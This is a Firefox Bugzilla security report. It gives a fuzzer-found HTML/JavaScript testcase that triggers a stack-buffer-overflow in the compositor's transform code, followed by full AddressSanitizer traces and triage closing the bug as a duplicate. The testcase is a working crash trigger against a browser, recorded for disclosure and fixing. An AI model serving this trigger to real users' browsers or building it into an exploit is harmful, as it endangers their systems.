Bug 1338774 (Closed)
Opened 7 years ago
Closed 7 years ago

stack-buffer-overflow in nsDisplayTransform::GetResultingTransformMatrixInternal

Categories: Core :: DOM: Animation, defect
Status: RESOLVED DUPLICATE of bug 1331704

Tracking:

| | Tracking | Status |
|---|---|---|
| firefox54 | --- | affected |

People: Reporter: nils, Unassigned

Description
The following testcase crashes the latest ASAN build of Firefox:

```html
<script>
function start() {
  o36=document.createElement('iframe');
  o36.src='data:text/html,<div><div><div><div><div>xx';
  o36.addEventListener('load', fun1);
  try{while(document.removeChild(document.firstChild));}catch(e){};undefined;
  o39=document.implementation.createHTMLDocument();
  o39.body.appendChild(o36);
  document.appendChild(o39.documentElement);
}
function fun1() {
  o555=o36.contentDocument.getElementsByTagName('*')[5];
  o555.animate([{MozTransform: 'none',}],150);
  try{while(document.removeChild(document.firstChild));}catch(e){};undefined;
  o692=document.implementation.createHTMLDocument();
  o692.body.appendChild(o555);
  document.appendChild(o692.documentElement);
  location.reload();
}
</script>
<body onload="start()"></body>
```

```
=================================================================
==29813==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f4e3774d788 at pc 0x7f4e813a210a bp 0x7f4e3774d330 sp 0x7f4e3774d328
READ of size 8 at 0x7f4e3774d788 thread T28 (Compositor)
    #0 0x7f4e813a2109 in nsDisplayTransform::GetResultingTransformMatrixInternal(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6408:81
    #1 0x7f4e813a05ad in nsDisplayTransform::GetResultingTransformMatrix(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6353:10
    #2 0x7f4e7c1734f3 in ApplyAnimatedValue /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:615:9
    #3 0x7f4e7c1734f3 in operator() /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:650
    #4 0x7f4e7c1734f3 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:137
    #5 0x7f4e7c1737a2 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:142:5
    #6 0x7f4e7c1737a2 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:142:5
    #7 0x7f4e7c1737a2 in _ZN7mozilla6layersL11ForEachNodeINS0_15ForwardIteratorEPNS0_5LayerEZNS0_L16SampleAnimationsES4_NS_9TimeStampEE3$_8ZNS0_11ForEachNodeIS2_S4_S6_EENS_8EnableIfIXsr6IsSameIDTclfp0_fp_EEvEE5valueEvE4TypeET0_RKT1_EUlS4_E_EENS8_IXaasr6IsSameIS9_vEE5valuesr6IsSameIDTclfp1_fp_EEvEE5valueEvE4TypeESC_SF_RKT2_ /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:142:5
    #8 0x7f4e7c13045f in ForEachNode<mozilla::layers::ForwardIterator, mozilla::layers::Layer *, (lambda at /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:638:7)> /home/worker/workspace/build/src/gfx/layers/TreeTraversal.h:165:3
    #9 0x7f4e7c13045f in SampleAnimations /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:636
    #10 0x7f4e7c13045f in mozilla::layers::AsyncCompositionManager::TransformShadowTree(mozilla::TimeStamp, mozilla::BaseTimeDuration<mozilla::TimeDurationValueCalculator>, mozilla::layers::AsyncCompositionManager::TransformsToSkip) /home/worker/workspace/build/src/gfx/layers/composite/AsyncCompositionManager.cpp:1309
    #11 0x7f4e7c1ce009 in mozilla::layers::CompositorBridgeParent::CompositeToTarget(mozilla::gfx::DrawTarget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const*) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorBridgeParent.cpp:982:27
    #12 0x7f4e7c1dc8d3 in ComposeToTarget /home/worker/workspace/build/src/gfx/layers/ipc/CompositorVsyncScheduler.cpp:344:3
    #13 0x7f4e7c1dc8d3 in mozilla::layers::CompositorVsyncScheduler::Composite(mozilla::TimeStamp) /home/worker/workspace/build/src/gfx/layers/ipc/CompositorVsyncScheduler.cpp:248
    #14 0x7f4e7c1f3dce in applyImpl<mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), StoreCopyPassByConstLRef<mozilla::TimeStamp> , 0> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:855:12
    #15 0x7f4e7c1f3dce in apply<mozilla::layers::CompositorVsyncScheduler, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp)> /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:861
    #16 0x7f4e7c1f3dce in mozilla::detail::RunnableMethodImpl<mozilla::layers::CompositorVsyncScheduler*, void (mozilla::layers::CompositorVsyncScheduler::*)(mozilla::TimeStamp), true, true, mozilla::TimeStamp>::Run() /home/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:890
    #17 0x7f4e7ae78ee7 in RunTask /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:358:3
    #18 0x7f4e7ae78ee7 in DeferOrRunPendingTask /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:366
    #19 0x7f4e7ae78ee7 in MessageLoop::DoWork() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:441
    #20 0x7f4e7ae7af38 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/chromium/src/base/message_pump_default.cc:36:21
    #21 0x7f4e7ae764b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #22 0x7f4e7ae764b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #23 0x7f4e7ae764b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #24 0x7f4e7ae959fa in base::Thread::ThreadMain() /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:179:3
    #25 0x7f4e7ae849fc in ThreadFunc(void*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:38:3
    #26 0x7f4e964ee6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    #27 0x7f4e9557782c in clone /build/glibc-t3gR2i/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109

Address 0x7f4e3774d788 is located in stack of thread T28 (Compositor) at offset 1096 in frame
    #0 0x7f4e813a05cf in nsDisplayTransform::GetResultingTransformMatrixInternal(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*) /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6378

  This frame has 16 object(s):
    [32, 64) 'refBox'
    [96, 104) ''
    [128, 136) 'dummy'
    [160, 161) 'dummyBool'
    [176, 200) 'svgTransform'
    [240, 264) 'transformFromSVGParent'
    [304, 368) ''
    [400, 464) 'perspectiveMatrix'
    [496, 560) ''
    [592, 656) ''
    [688, 752) ''
    [784, 816) 'props'
    [848, 856) ''
    [880, 944) 'parent'
    [976, 984) ''
    [1008, 1072) '' <== Memory access at offset 1096 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
      (longjmp and C++ exceptions *are* supported)
Thread T28 (Compositor) created by T0 here:
    #0 0x49b119 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f4e7ae8391c in CreateThread /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:137:14
    #2 0x7f4e7ae8391c in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:148
    #3 0x7f4e7ae95451 in base::Thread::StartWithOptions(base::Thread::Options const&) /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:98:8
    #4 0x7f4e7c1db1c8 in CreateCompositorThread /home/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:102:8
    #5 0x7f4e7c1db1c8 in mozilla::layers::CompositorThreadHolder::CompositorThreadHolder() /home/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:53
    #6 0x7f4e7c1db31a in mozilla::layers::CompositorThreadHolder::Start() /home/worker/workspace/build/src/gfx/layers/ipc/CompositorThread.cpp:118:33
    #7 0x7f4e7c33dc6f in InitLayersIPC /home/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:946:9
    #8 0x7f4e7c33dc6f in gfxPlatform::Init() /home/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:708
    #9 0x7f4e7c33b3a2 in gfxPlatform::GetPlatform() /home/worker/workspace/build/src/gfx/thebes/gfxPlatform.cpp:535:9
    #10 0x7f4e80259fd7 in mozilla::widget::GfxInfoBase::GetContentBackend(nsAString_internal&) /home/worker/workspace/build/src/widget/GfxInfoBase.cpp:1441:25
    #11 0x7f4e7a114551 in NS_InvokeByIndex /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:115
    #12 0x7f4e7b8d60b7 in Invoke /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:2010:12
    #13 0x7f4e7b8d60b7 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1329
    #14 0x7f4e7b8d60b7 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #15 0x7f4e7b8de337 in GetAttribute /home/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1679:17
    #16 0x7f4e7b8de337 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1019
    #17 0x7f4e83f14e17 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #18 0x7f4e83f14e17 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:460
    #19 0x7f4e83f163ee in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:505:12
    #20 0x7f4e83f163ee in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524
    #21 0x7f4e83f163ee in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:638
    #22 0x7f4e84e34f15 in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1806:16
    #23 0x7f4e84e34f15 in GetExistingProperty<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1854
    #24 0x7f4e84e34f15 in NativeGetPropertyInline<js::AllowGC::CanGC> /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2083
    #25 0x7f4e84e34f15 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<jsid>, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2117
    #26 0x7f4e83eff656 in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1431:12
    #27 0x7f4e83eff656 in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:852
    #28 0x7f4e83eff656 in GetObjectElementOperation /home/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:464
    #29 0x7f4e83eff656 in GetElementOperation /home/worker/workspace/build/src/js/src/vm/Interpreter-inl.h:569
    #30 0x7f4e83eff656 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2795
    #31 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #32 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #33 0x7f4e83efb168 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #34 0x7f4e83efb168 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #35 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #36 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #37 0x7f4e83efb168 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #38 0x7f4e83efb168 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #39 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #40 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #41 0x7f4e83f15782 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #42 0x7f4e84b9b8dc in js::Wrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/Wrapper.cpp:165:12
    #43 0x7f4e84b60fa4 in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) const /home/worker/workspace/build/src/js/src/proxy/CrossCompartmentWrapper.cpp:351:14
    #44 0x7f4e84b7bb62 in js::Proxy::call(JSContext*, JS::Handle<JSObject*>, JS::CallArgs const&) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:421:12
    #45 0x7f4e84b7e184 in js::proxy_Call(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/proxy/Proxy.cpp:662:12
    #46 0x7f4e83f14ee0 in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:281:15
    #47 0x7f4e83f14ee0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #48 0x7f4e83efb168 in CallFromStack /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:511:12
    #49 0x7f4e83efb168 in Interpret(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2957
    #50 0x7f4e83ee02fa in js::RunScript(JSContext*, js::RunState&) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:406:12
    #51 0x7f4e83f150bc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:478:15
    #52 0x7f4e83f15782 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:524:10
    #53 0x7f4e848c77a3 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>) /home/worker/workspace/build/src/js/src/jsapi.cpp:2785:12
    #54 0x7f4e7b8bb533 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1214:23
    #55 0x7f4e7a115c86 in PrepareAndDispatch /home/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:122:14
    #56 0x7f4e7a114c56 in SharedStub (/home/nils/fuzzer3/firefox/libxul.so+0x2076c56)
    #57 0x7f4e7a0a3b05 in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*) /home/worker/workspace/build/src/xpcom/components/nsCategoryManager.cpp:821:9
    #58 0x7f4e83aad3e6 in nsXREDirProvider::DoStartup() /home/worker/workspace/build/src/toolkit/xre/nsXREDirProvider.cpp:1167:11
    #59 0x7f4e83a88d70 in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4289:3
    #60 0x7f4e83a8b3e8 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4635:8
    #61 0x7f4e83a8c6ac in XRE_main(int, char**, mozilla::BootstrapConfig const&) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4726:16
    #62 0x4dfebf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:234:10
    #63 0x4dfebf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:305
    #64 0x7f4e9549182f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: stack-buffer-overflow /home/worker/workspace/build/src/layout/painting/nsDisplayList.cpp:6408:81 in nsDisplayTransform::GetResultingTransformMatrixInternal(nsDisplayTransform::FrameTransformProperties const&, nsPoint const&, float, unsigned int, nsRect const*)
Shadow bytes around the buggy address:
  0x0fea46ee1aa0: 00 00 f2 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
  0x0fea46ee1ab0: f2 f2 00 00 00 00 00 00 00 00 f2 f2 f2 f2 00 00
  0x0fea46ee1ac0: 00 00 00 00 00 00 f2 f2 f2 f2 00 00 00 00 f2 f2
  0x0fea46ee1ad0: f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
  0x0fea46ee1ae0: f2 f2 00 f2 f2 f2 00 00 00 00 00 00 00 00 f3 f3
=>0x0fea46ee1af0: f3[f3]f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fea46ee1b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fea46ee1b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fea46ee1b20: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
  0x0fea46ee1b30: 00 04 f2 f2 00 00 00 00 f2 f2 f2 f2 00 00 00 00
  0x0fea46ee1b40: 00 00 00 00 f2 f2 f2 f2 01 f2 00 00 f3 f3 f3 f3
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29813==ABORTING
###!!! [Child][MessageChannel::SendAndWait] Error: Channel error: cannot send/recv
ASAN:DEADLYSIGNAL
=================================================================
==29913==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f8e8e44b3c1 bp 0x7f8e8a542610 sp 0x7f8e8a5425f0 T2)
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0008,name=PLayerTransaction::Msg_ReleaseCompositable) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0008,name=PLayerTransaction::Msg_ReleaseCompositable) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0xDA0003,name=PTexture::Msg_Destroy) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0008,name=PLayerTransaction::Msg_ReleaseCompositable) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv
###!!! [Child][MessageChannel] Error: (msgtype=0x8A0007,name=PLayerTransaction::Msg_ReleaseLayer) Channel error: cannot send/recv
    #0 0x7f8e8e44b3c0 in mozilla::ipc::MessageChannel::OnChannelErrorFromLink() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2200:13
    #1 0x7f8e8e450bb3 in OnChannelError /home/worker/workspace/build/src/ipc/glue/MessageLink.cpp:367:5
    #2 0x7f8e8e450bb3 in non-virtual thunk to mozilla::ipc::ProcessLink::OnChannelError() /home/worker/workspace/build/src/ipc/glue/MessageLink.cpp:359
    #3 0x7f8e8e408ee6 in event_persist_closure /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1319:9
    #4 0x7f8e8e408ee6 in event_process_active_single_queue /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1363
    #5 0x7f8e8e408ee6 in event_process_active /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1438
    #6 0x7f8e8e408ee6 in event_base_loop /home/worker/workspace/build/src/ipc/chromium/src/third_party/libevent/event.c:1639
    #7 0x7f8e8e3c8fc1 in base::MessagePumpLibevent::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/chromium/src/base/message_pump_libevent.cc:373:7
    #8 0x7f8e8e3c34b8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #9 0x7f8e8e3c34b8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #10 0x7f8e8e3c34b8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #11 0x7f8e8e3e29fa in base::Thread::ThreadMain() /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:179:3
    #12 0x7f8e8e3d19fc in ThreadFunc(void*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:38:3
    #13 0x7f8ea9a3b6b9 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76b9)
    #14 0x7f8ea8ac482c in clone /build/glibc-t3gR2i/glibc-2.23/misc/../sysdeps/unix/sysv/linux/x86_64/clone.S:109

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2200:13 in mozilla::ipc::MessageChannel::OnChannelErrorFromLink()
Thread T2 (Chrome_ChildThr) created by T0 (Web Content) here:
    #0 0x49b119 in __interceptor_pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:238:3
    #1 0x7f8e8e3d091c in CreateThread /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:137:14
    #2 0x7f8e8e3d091c in PlatformThread::Create(unsigned long, PlatformThread::Delegate*, unsigned long*) /home/worker/workspace/build/src/ipc/chromium/src/base/platform_thread_posix.cc:148
    #3 0x7f8e8e3e2451 in base::Thread::StartWithOptions(base::Thread::Options const&) /home/worker/workspace/build/src/ipc/chromium/src/base/thread.cc:98:8
    #4 0x7f8e8e452c17 in mozilla::ipc::ProcessChild::ProcessChild(int) /home/worker/workspace/build/src/ipc/glue/ProcessChild.cpp:24:5
    #5 0x7f8e96fddea4 in ContentProcess /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/ContentProcess.h:31:7
    #6 0x7f8e96fddea4 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:629
    #7 0x4e00c6 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #8 0x4e00c6 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:284
    #9 0x7f8ea89de82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
==29913==ABORTING
```
Comment 1 (7 years ago)

Looks like some more animation stuff.

Comment 2 (7 years ago)

This looks like another variant of bug 1331704. I will check the test case in comment 0 on the latest ASAN build.

Flags: needinfo?(bbirtles) → needinfo?(hikezoe)

Comment 3 (7 years ago)

Confirmed.

Status: NEW → RESOLVED
Closed: 7 years ago
Flags: needinfo?(hikezoe)
Resolution: --- → DUPLICATE

Updated (7 years ago)

Updated (5 years ago)

Group: dom-core-security